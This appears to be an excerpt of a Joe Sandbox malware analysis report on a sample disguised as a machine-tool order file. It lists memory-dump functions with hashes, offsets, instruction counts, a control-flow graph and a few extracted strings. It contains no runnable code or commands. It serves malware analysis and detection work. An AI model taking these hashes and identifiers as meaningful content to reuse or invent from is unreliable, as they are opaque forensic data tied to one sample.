                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F972BC75E01228CFEB64DF69C980BDDBBB2BB89304F5481E9D848A7255DB349E85CF40
                                                                                                                                                                                                                          Function 385EA290 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6b1399854d761e4c5e2884c21ca99b87f80f094ec690c05e4a1a429e4ddbd6d7
                                                                                                                                                                                                                          • Instruction ID: 07d6f91d73c0c710ab134a1ef082e71b0e33de889f5cc7dd6b3ad0e82d5395ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b1399854d761e4c5e2884c21ca99b87f80f094ec690c05e4a1a429e4ddbd6d7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04E1C074E01218CFEB55DFA5C984BDDBBB2BF88304F2081AAD408A73A5DB355A85CF51
                                                                                                                                                                                                                          Function 38CA1828 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 230f337dd845dffe5af9824204417d6efd4b9c4f7386ef20e54d2411e3a298bf
                                                                                                                                                                                                                          • Instruction ID: 941033c92241271a03eef600e31a27e85e760169caf656ebb1332f3c375d00e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230f337dd845dffe5af9824204417d6efd4b9c4f7386ef20e54d2411e3a298bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D1B174E003188FDB54DFA9C991B9DBBB2BF89300F1081AAD409AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C861E8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0c71fcbc685b6aec06df1fa47050348cc445559c4e21a99c1859e22620dbdd1b
                                                                                                                                                                                                                          • Instruction ID: da731a26a7c1868bbe196e6eae53beec2ca58d9a94379848b94f81557664cabb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c71fcbc685b6aec06df1fa47050348cc445559c4e21a99c1859e22620dbdd1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19D1D074E003188FDB54DFA9C995B9DBBB2BF89300F1081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8D970 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 332fd17159f95ddf20538eba35be7f6ab6a557c4a25e16ef8363253aabcb6b5d
                                                                                                                                                                                                                          • Instruction ID: 3f21951b332ee725346ef2c7fcd5029cd5aeb36d3ba1bd02878e4b7b7abb002a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 332fd17159f95ddf20538eba35be7f6ab6a557c4a25e16ef8363253aabcb6b5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D1C174E003188FDB54DFA9C951B9DBBB2BF89300F6081A9D408AB365DB355E86CF51
                                                                                                                                                                                                                          Function 385EA8E8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 92a7fd4f5cda2b64ae4821dc8783aee9ef9e6439f97316b2fdda26f18a8db434
                                                                                                                                                                                                                          • Instruction ID: 2dea321b23fe7d701e554d108ab56e49aa0494326a9e277fda1386bc23a57d15
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a7fd4f5cda2b64ae4821dc8783aee9ef9e6439f97316b2fdda26f18a8db434
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D1A178E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385D1E80 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 82d32a2d9f8befab57f40d18786b2dfa54489a53b5075f8a247745d2e3928bdc
                                                                                                                                                                                                                          • Instruction ID: 7178a13aed94057c411e99929ae5648c30faf89d12c2cc80be907e89480aae26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82d32a2d9f8befab57f40d18786b2dfa54489a53b5075f8a247745d2e3928bdc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C1AE74E01218CFDB54DFA5C945B9DBBB2FF88314F2080A9D809AB3A5DB359A85CF50
                                                                                                                                                                                                                          Function 385E8BA0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 384949c3b8df850be1a339a286e5cfdcbb8673bcb28d96cda0d7a42ae776512a
                                                                                                                                                                                                                          • Instruction ID: 6b9297cb066ea45fc5ee0957ab3f274ed5fdd052659fd4c804d18e9ca00beaa5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384949c3b8df850be1a339a286e5cfdcbb8673bcb28d96cda0d7a42ae776512a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBC1BF74E01218CFDB54DFA5C945B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385D279E Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9a7075c0bc20c5aad2f4a4889df8aa09ef9ecb1a345612843f272f265f605081
                                                                                                                                                                                                                          • Instruction ID: 7bd564b29101fc3a3de36cc108727cbab22e4a9dd98bd5b9a50d1f4a03e85822
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a7075c0bc20c5aad2f4a4889df8aa09ef9ecb1a345612843f272f265f605081
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4191E374D00308CFEB14DFA8D584BDCBBB1BF49315F208269E409AB291DB74A989CF50
                                                                                                                                                                                                                          Function 38CAF988 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2e12adce27355e8174048b1be00d98c7aec8714883be9c67ac8a87d6a25ec0e1
                                                                                                                                                                                                                          • Instruction ID: 093214c1689be639d17ac3772bc7b149cc09cc4d4a6aff88879fffec39b092b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e12adce27355e8174048b1be00d98c7aec8714883be9c67ac8a87d6a25ec0e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6481B274E012188FDB58DFA9C891BDDBBB2FF88304F608129D845AB3A5DB395946CF50
                                                                                                                                                                                                                          Function 38CA7FA8 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 07015a99d53080aa355bb07e0dad69ac9ba1e8ca52f2a3ecee3892c8f8007b97
                                                                                                                                                                                                                          • Instruction ID: 4bbbb8c75360cb8896eb7c1d36aa265adedcc1c1fca800be1fa7450d5233e106
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07015a99d53080aa355bb07e0dad69ac9ba1e8ca52f2a3ecee3892c8f8007b97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE81A375E002188FDB58DFA9C991B9DBBB2FF88300F608129D445BB399DB395946CF50
                                                                                                                                                                                                                          Function 38CAF668 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: db1da3cd786262d8ddd01e71dfb80fc196e1228d958c9cc781fd21fafe6fa3d3
                                                                                                                                                                                                                          • Instruction ID: ca1b29dcd1856fa408a672abfe59f32ecd87dcd308f94541774cd9742c0eea32
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db1da3cd786262d8ddd01e71dfb80fc196e1228d958c9cc781fd21fafe6fa3d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD81B174E002189FDB58DFA9C991B9DBBB2FF88300F608129D804AB3A5DB395946CF50
                                                                                                                                                                                                                          Function 385EA7DE Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cb7863a38992982e7bdc609643d7082196950a891bdf27d18288091e1c9f8da9
                                                                                                                                                                                                                          • Instruction ID: 9aba5a770c4ba947e2c492e82b19efd0bf59c8be3e4a159a95ac077d46426082
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb7863a38992982e7bdc609643d7082196950a891bdf27d18288091e1c9f8da9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39517DB5D056989FEB06DFBAD8542CDFFF2AF8A310F1480AEC444AB616D634058ACF50
                                                                                                                                                                                                                          Function 38C860D8 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6e56bd44d6a2a1be950f4b58eb94dea36f4386f9bf920f5b2b2049ef7cac6f87
                                                                                                                                                                                                                          • Instruction ID: 828dd74214ee1aafe0edc9172603f01d4c6b129d67adee7e3a8c0201ecb2acf0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e56bd44d6a2a1be950f4b58eb94dea36f4386f9bf920f5b2b2049ef7cac6f87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F15170B8E113088BDB05DFA6C44469DBFF2BF89304F90C8A9C498AB365DB361946CF51
                                                                                                                                                                                                                          Function 0011E781 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e9c57fe22ee7d1e095d04535cee2e27a4b34615a6da015cad97c98e04d4c4c1a
                                                                                                                                                                                                                          • Instruction ID: e177a174d61501aa96f37bd555a3b84a5f838e2e025eb1c216786a198b7ac7ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c57fe22ee7d1e095d04535cee2e27a4b34615a6da015cad97c98e04d4c4c1a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF519174E002089FEB19DFAAD554ADDBBF2EF89310F24812AE815AB364DB345946CF14
                                                                                                                                                                                                                          Function 0011E790 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4549230a7f82e031b01802e59dc77cf69543efd7a1ef276ab5de6414ed19a3ea
                                                                                                                                                                                                                          • Instruction ID: 2cef91519aef1043a4aad7282e6ee3b62f645685759e07f3a0e8208602099f25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4549230a7f82e031b01802e59dc77cf69543efd7a1ef276ab5de6414ed19a3ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E518374E002089FEB19DFEAD554A9DFBF2EF89300F24812AE815AB364DB345945CF54
                                                                                                                                                                                                                          Function 385EA280 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b259fee1400d8c9a6c5678ff173ae8431337b3cf27d5411a71e23db2b6c4f081
                                                                                                                                                                                                                          • Instruction ID: 94b3177183ff74093c912217b3466e3b5d066c997d09c5efb1a4497cdb3f6331
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b259fee1400d8c9a6c5678ff173ae8431337b3cf27d5411a71e23db2b6c4f081
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B41F2B4D01618CBEB18CFAAC8447DEBBF2AF88300F60C06AD418BB254DB355986CF54
                                                                                                                                                                                                                          Function 38C8D95F Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9a3648d7487faa324946033ea9c37a8e836c5d379f29795bdd4bce87e67c4809
                                                                                                                                                                                                                          • Instruction ID: a21520728022616e59d7835ddda1f62baf6c7421717cae7dc69217bbb4861deb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a3648d7487faa324946033ea9c37a8e836c5d379f29795bdd4bce87e67c4809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C41F5B5D042088BEB18CFAAC9507DEBBF2BF89304F14C46AC418BB255EB355946CF50
                                                                                                                                                                                                                          Function 385E8B91 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d4120aac323297f67f7e76de7dac7e2b0e3753112b072905ced4f5dd6a87d9e8
                                                                                                                                                                                                                          • Instruction ID: 5e5b559a0205ed50fd8d0c245a47176268efac585788c5df03eb323952dbf1d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4120aac323297f67f7e76de7dac7e2b0e3753112b072905ced4f5dd6a87d9e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC41D3B4E01648CBEB19CFAAC9446DDBBF2BF89300F24C52AD418BB265DB345946CF40
                                                                                                                                                                                                                          Function 00117670 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 117670-1176a5 2 117ad4-117ad8 0->2 3 1176ab-1176ce 0->3 4 117af1-117aff 2->4 5 117ada-117aee 2->5 12 1176d4-1176e1 3->12 13 11777c-117780 3->13 10 117b01-117b16 4->10 11 117b70-117b85 4->11 18 117b18-117b1b 10->18 19 117b1d-117b2a 10->19 20 117b87-117b8a 11->20 21 117b8c-117b99 11->21 29 1176f0 12->29 30 1176e3-1176ee 12->30 14 117782-117790 13->14 15 1177c8-1177d1 13->15 14->15 37 117792-1177ad 14->37 22 117be7 15->22 23 1177d7-1177e1 15->23 25 117b2c-117b6d 18->25 19->25 26 117b9b-117bd6 20->26 21->26 31 117bec-117c1c 22->31 23->2 27 1177e7-1177f0 23->27 78 117bdd-117be4 26->78 35 1177f2-1177f7 27->35 36 1177ff-11780b 27->36 32 1176f2-1176f4 29->32 30->32 54 117c35-117c3c 31->54 55 117c1e-117c34 31->55 32->13 39 1176fa-11775c 32->39 35->36 36->31 42 117811-117817 36->42 61 1177bb 37->61 62 1177af-1177b9 37->62 87 117762-117779 39->87 88 11775e 39->88 44 11781d-11782d 42->44 45 117abe-117ac2 42->45 59 117841-117843 44->59 60 11782f-11783f 44->60 45->22 48 117ac8-117ace 45->48 48->2 48->27 63 117846-11784c 59->63 60->63 64 1177bd-1177bf 61->64 62->64 63->45 65 117852-117861 63->65 64->15 66 1177c1 64->66 73 117867 65->73 74 11790f-11793a call 1174b8 * 2 65->74 66->15 76 11786a-11787b 73->76 91 117940-117944 74->91 92 117a24-117a3e 74->92 76->31 80 117881-117893 76->80 80->31 82 117899-1178b1 80->82 145 1178b3 call 117c41 82->145 146 1178b3 call 117c50 82->146 85 1178b9-1178c9 85->45 90 1178cf-1178d2 85->90 87->13 88->87 93 1178d4-1178da 90->93 94 1178dc-1178df 90->94 91->45 96 11794a-11794e 91->96 92->2 114 117a44-117a48 92->114 93->94 97 1178e5-1178e8 93->97 94->22 94->97 99 117950-11795d 96->99 100 117976-11797c 96->100 101 1178f0-1178f3 97->101 102 1178ea-1178ee 97->102 117 11796c 99->117 118 11795f-11796a 99->118 103 1179b7-1179bd 100->103 104 11797e-117982 100->104 101->22 105 1178f9-1178fd 101->105 102->101 102->105 108 1179c9-1179cf 103->108 109 1179bf-1179c3 103->109 104->103 107 117984-11798d 104->107 105->22 106 117903-117909 105->106 106->74 106->76 112 11799c-1179b2 107->112 113 11798f-117994 107->113 115 1179d1-1179d5 108->115 116 1179db-1179dd 108->116 109->78 109->108 112->45 113->112 120 117a84-117a88 114->120 121 117a4a-117a54 call 116360 114->121 115->45 115->116 122 117a12-117a14 116->122 123 1179df-1179e8 116->123 119 11796e-117970 117->119 118->119 119->45 119->100 120->78 128 117a8e-117a92 120->128 121->120 133 117a56-117a6b 121->133 122->45 126 117a1a-117a21 122->126 124 1179f7-117a0d 123->124 125 1179ea-1179ef 123->125 124->45 125->124 128->78 131 117a98-117aa5 128->131 137 117ab4 131->137 138 117aa7-117ab2 131->138 133->120 142 117a6d-117a82 133->142 139 117ab6-117ab8 137->139 138->139 139->45 139->78 142->2 142->120 145->85 146->85
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$(oZr$(oZr$(oZr$(oZr$(oZr$,^r$,^r
                                                                                                                                                                                                                          • API String ID: 0-1216610992
                                                                                                                                                                                                                          • Opcode ID: 0cd6389f55ab1e3a484ae8b1ab9a1cc0c87d9314f1d22c18da2e82450b0a3671
                                                                                                                                                                                                                          • Instruction ID: 13b1e381b87454436d8a721a21952db898f5ce3c8e2fa8d0b6cd0748d62b7f6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cd6389f55ab1e3a484ae8b1ab9a1cc0c87d9314f1d22c18da2e82450b0a3671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01124B34A086089FCB19CF68D994AEEBBF1EF48714F1585A9E445DB3A1DB30ED81CB50
                                                                                                                                                                                                                          Function 0011EDF7 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1924 11edf7-11ee29 1925 11ee30-11ee96 1924->1925 1926 11ee2b 1924->1926 1931 11f025-11f02e 1925->1931 1932 11ee9c-11eeb4 1925->1932 1926->1925 1935 11efd0-11efeb 1932->1935 1937 11eff1-11f015 1935->1937 1938 11eeb9-11efcf 1935->1938 1937->1931 1938->1935
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4;5$`:5$`:5$`:5
                                                                                                                                                                                                                          • API String ID: 0-3460329444
                                                                                                                                                                                                                          • Opcode ID: 4a6942616444a8bf1cf25d22bbcb7fa63a582c9a274abcaf1c1e1d9efaac11c3
                                                                                                                                                                                                                          • Instruction ID: d995e7430f53e86973ddd0e80a7f74d3564cc93adcbf126a90b11b534d600f3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a6942616444a8bf1cf25d22bbcb7fa63a582c9a274abcaf1c1e1d9efaac11c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8610E34E01218CFDB19DFA4D955AEDBBB2FF88304F20812AD845AB3A5DB355A46CF41
                                                                                                                                                                                                                          Function 00119008 Relevance: 4.2, Strings: 3, Instructions: 496COMMON
